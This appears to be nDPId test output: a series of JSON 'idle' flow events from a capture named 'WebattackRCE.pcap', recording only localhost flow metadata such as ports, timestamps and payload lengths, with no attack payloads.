+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":217,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277007,"flow_last_seen":1576420277007,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49978,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":218,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277010,"flow_last_seen":1576420277010,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49980,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":219,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277011,"flow_last_seen":1576420277011,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49982,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":220,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277013,"flow_last_seen":1576420277013,"flow_idle_time":7560000,"flow_min_l4_payload_len":139,"flow_max_l4_payload_len":139,"flow_tot_l4_payload_len":139,"flow_avg_l4_payload_len":139,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49984,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":221,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277014,"flow_last_seen":1576420277014,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49986,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":222,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277016,"flow_last_seen":1576420277016,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49988,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":223,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277017,"flow_last_seen":1576420277017,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49990,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":224,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277019,"flow_last_seen":1576420277019,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49992,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":225,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277020,"flow_last_seen":1576420277020,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49994,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":226,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277021,"flow_last_seen":1576420277021,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49996,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":227,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277023,"flow_last_seen":1576420277023,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":49998,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":228,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277025,"flow_last_seen":1576420277025,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50000,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":229,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277027,"flow_last_seen":1576420277027,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50002,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":230,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277028,"flow_last_seen":1576420277028,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50004,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":231,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277029,"flow_last_seen":1576420277029,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50006,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":232,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277031,"flow_last_seen":1576420277031,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":140,"flow_tot_l4_payload_len":140,"flow_avg_l4_payload_len":140,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50008,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":233,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277032,"flow_last_seen":1576420277032,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50010,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":234,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277033,"flow_last_seen":1576420277033,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50012,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":235,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277034,"flow_last_seen":1576420277034,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50014,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":236,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277036,"flow_last_seen":1576420277036,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50016,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":237,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277037,"flow_last_seen":1576420277037,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50018,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":238,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277040,"flow_last_seen":1576420277040,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50020,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":239,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277041,"flow_last_seen":1576420277041,"flow_idle_time":7560000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50022,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":240,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277042,"flow_last_seen":1576420277042,"flow_idle_time":7560000,"flow_min_l4_payload_len":149,"flow_max_l4_payload_len":149,"flow_tot_l4_payload_len":149,"flow_avg_l4_payload_len":149,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50024,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":241,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277044,"flow_last_seen":1576420277044,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50026,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277045,"flow_last_seen":1576420277045,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50028,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277046,"flow_last_seen":1576420277046,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50030,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277048,"flow_last_seen":1576420277048,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50032,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277049,"flow_last_seen":1576420277049,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50034,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277050,"flow_last_seen":1576420277050,"flow_idle_time":7560000,"flow_min_l4_payload_len":144,"flow_max_l4_payload_len":144,"flow_tot_l4_payload_len":144,"flow_avg_l4_payload_len":144,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50036,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277051,"flow_last_seen":1576420277051,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50038,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277054,"flow_last_seen":1576420277054,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":145,"flow_tot_l4_payload_len":145,"flow_avg_l4_payload_len":145,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50040,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277055,"flow_last_seen":1576420277055,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50042,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277057,"flow_last_seen":1576420277057,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50044,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277058,"flow_last_seen":1576420277058,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50046,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277060,"flow_last_seen":1576420277060,"flow_idle_time":7560000,"flow_min_l4_payload_len":141,"flow_max_l4_payload_len":141,"flow_tot_l4_payload_len":141,"flow_avg_l4_payload_len":141,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50048,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":253,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277061,"flow_last_seen":1576420277061,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50050,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":254,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277063,"flow_last_seen":1576420277063,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50052,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":255,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277064,"flow_last_seen":1576420277064,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50054,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":256,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277066,"flow_last_seen":1576420277066,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50056,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":257,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277067,"flow_last_seen":1576420277067,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50058,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":258,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277070,"flow_last_seen":1576420277070,"flow_idle_time":7560000,"flow_min_l4_payload_len":142,"flow_max_l4_payload_len":142,"flow_tot_l4_payload_len":142,"flow_avg_l4_payload_len":142,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50060,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":259,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277072,"flow_last_seen":1576420277072,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50062,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":260,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277074,"flow_last_seen":1576420277074,"flow_idle_time":7560000,"flow_min_l4_payload_len":143,"flow_max_l4_payload_len":143,"flow_tot_l4_payload_len":143,"flow_avg_l4_payload_len":143,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50064,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":261,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277075,"flow_last_seen":1576420277075,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50066,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00587{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":797,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":262,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277077,"flow_last_seen":1576420277077,"flow_idle_time":7560000,"flow_min_l4_payload_len":137,"flow_max_l4_payload_len":137,"flow_tot_l4_payload_len":137,"flow_avg_l4_payload_len":137,"midstream":1,"thread_ts_msec":1576420278014,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50068,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
